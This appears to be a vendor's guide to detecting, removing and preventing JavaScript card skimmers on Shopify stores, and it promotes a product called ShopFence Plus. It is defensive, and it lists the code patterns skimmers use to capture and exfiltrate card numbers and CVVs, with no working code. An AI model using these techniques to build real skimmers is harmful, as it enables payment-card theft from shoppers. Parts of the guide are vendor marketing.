Shopify malware is rarer than WordPress malware — but when it hits, it hits where it hurts most: your checkout. Shopify malware in 2026 almost always arrives through a compromised third-party app or theme, and the most common payload is a JavaScript skimmer that captures customer card details in real time. This guide covers how to detect Shopify malware, how to remove it, and the realistic prevention setup that catches new variants before they steal a single card.

How Shopify gets infected (the four real attack paths in 2026)

• Compromised third-party app. A legitimate app developer gets breached. Their update pushes malicious JavaScript to every store that installed it. This is the #1 Shopify malware vector — and you have no visibility into it.
• Malicious theme. A “free premium theme” downloaded from a third-party site contains hidden JavaScript that loads on every page. Theme marketplaces outside Shopify’s official store are full of these.
• Staff-account takeover. A staff account with theme-edit permission gets phished, and the attacker pastes a skimmer directly into the theme.
• Liquid injection via app permissions. An app you authorized to edit your theme gets compromised and modifies your theme files without you noticing.

In all four cases the attacker’s goal is the same: get JavaScript running on your checkout page so they can capture form fields (card number, CVV, address) and exfiltrate them to a remote server.

How to detect Shopify malware

Symptoms of an infected Shopify store fall into two buckets — visible and invisible. The invisible kind is far more dangerous.

Visible symptoms (catchable manually)

• Customer complaints about “phantom charges” after checkout
• Spike in chargebacks with no obvious order pattern
• Unfamiliar redirects from your domain to external sites
• Pop-up ads appearing on your storefront
• Strange JavaScript files in your theme’s assets folder
• Theme file modification timestamps that do not match your last edit

Invisible symptoms (require scanning)

• JavaScript skimmer hidden inside a legitimate-looking script (obfuscated function names, base64-encoded URLs)
• Third-party app silently adding tracking pixels that double as exfiltration channels
• Outbound HTTP requests from your storefront to suspicious domains
• Modified checkout templates (if you have access) with extra event listeners

Manual detection of the invisible kind is nearly impossible. You need automated theme scanning that compares your current theme files against a clean baseline and alerts on changes. This is exactly what ShopFence Plus does on every theme change.

How to remove Shopify malware (emergency response)

If you suspect or confirm a malware infection, work through this in order. Speed matters — every additional checkout completed while infected is a stolen card.

1. Put your store on password protection immediately (Online Store → Preferences → Password page). This stops new checkouts while you investigate.
2. Identify the entry point. Check your installed apps list for anything you do not recognize or did not install yourself. Uninstall suspicious apps.
3. Audit staff access. Settings → Users and permissions. Remove any unfamiliar accounts. Force password reset on the rest. Enable 2FA on all remaining accounts.
4. Diff your theme. Online Store → Themes → Actions → Edit code. Compare current theme against your last backup. Look for unfamiliar JavaScript, modified layout files, or new files in assets/.
5. Restore from a clean theme backup. If you have one, restore it. If not, duplicate your current theme, strip out everything suspicious manually, then publish.
6. Re-take your store live and monitor checkouts for the next 24 hours.
7. Notify affected customers if any checkouts occurred during the infection window. Refund proactively if necessary.
8. File a report with Shopify Trust & Safety at shopify.com/security/report.

Common Shopify malware patterns (what to look for)

When auditing theme code, these are the suspicious patterns to grep for:

• atob() and dynamic code execution patterns — base64-decoded code execution is a textbook skimmer pattern
• Long hex or base64 strings inside script tags — encoded payload
• Event listeners on checkout form fields — capturing card details as users type
• Fetch / XHR to non-Shopify domains with credit_card, cvv, or card_number in the body
• Modified analytics templates with extra document.write calls
• External script tags from sketchy CDNs (anything not cdn.shopify.com, well-known analytics, or your installed apps)

If you find any of these in a file you did not modify, you have malware.

Preventing Shopify malware (the realistic setup)

1. 2FA on every admin and staff account. Stops account-takeover infections cold.
2. Audit apps quarterly. Uninstall what you do not use. Each app is a code-injection vector — minimize them.
3. Only install themes from Shopify’s official store. “Free premium theme” downloads from random sites are the #1 source of pre-infected stores.
4. Install a real-time theme scanner. ShopFence Plus monitors theme files for changes and alerts you when something unexpected happens.
5. Review staff permissions. Most staff do not need “theme edit” or “app install” — restrict those to the owner.
6. Keep weekly theme backups. Duplicate your live theme every Friday. If you ever need to roll back, the clean copy is one click away.

Will Shopify warn me about malware?

Sometimes. Shopify monitors for known skimmer signatures and will notify you if their detection fires. But that detection is reactive — it usually only catches malware after it has been in the wild for days or weeks. Real-time scanning at the merchant level catches it the moment it appears, not after Shopify’s threat intelligence catches up.

Frequently asked questions

Can a Shopify store get malware?

Yes — almost always through a compromised third-party app, malicious theme from outside the official store, or a phished staff account. The platform itself is hardened, but anything you install on top of it expands the surface.

How do I scan my Shopify theme for malware?

Manual: open every theme file and grep for atob, base64 strings, and external script tags. Automated: install a Shopify security app with theme scanning like ShopFence Plus, which checks your theme against a clean baseline every time it changes.

What is a Shopify checkout skimmer?

JavaScript code injected into your storefront that reads customer payment fields (card number, CVV, billing address) as they type, and sends them to an attacker-controlled server. The customer’s order still completes normally — they only notice when a phantom charge appears later.

Will Shopify refund customers if my store was infected?

Shopify Protect covers eligible chargebacks, but not skimmer-stolen card use that happens outside Shopify. The card-issuing bank typically refunds the consumer; the financial responsibility for the breach may fall on the merchant under PCI rules. Notify customers proactively and offer to refund the order — it preserves the relationship and reduces reputational damage.

How do I tell if a Shopify app is safe to install?

Use only apps from the official Shopify App Store (filtered for verified developers), check the install count and reviews, look for an active maintenance pattern (recent updates), and read the requested permissions — be cautious of apps that ask for “modify theme code” or “manage all orders” if they do not need it.

Bottom line

Shopify malware is rare but expensive. Prevention is cheap: limit app installs, use 2FA, and run real-time theme scanning. ShopFence Plus includes theme scanning, malware alerts, and the bot detection that often catches the infection vector itself. For the full picture, see our complete 2026 Shopify security guide.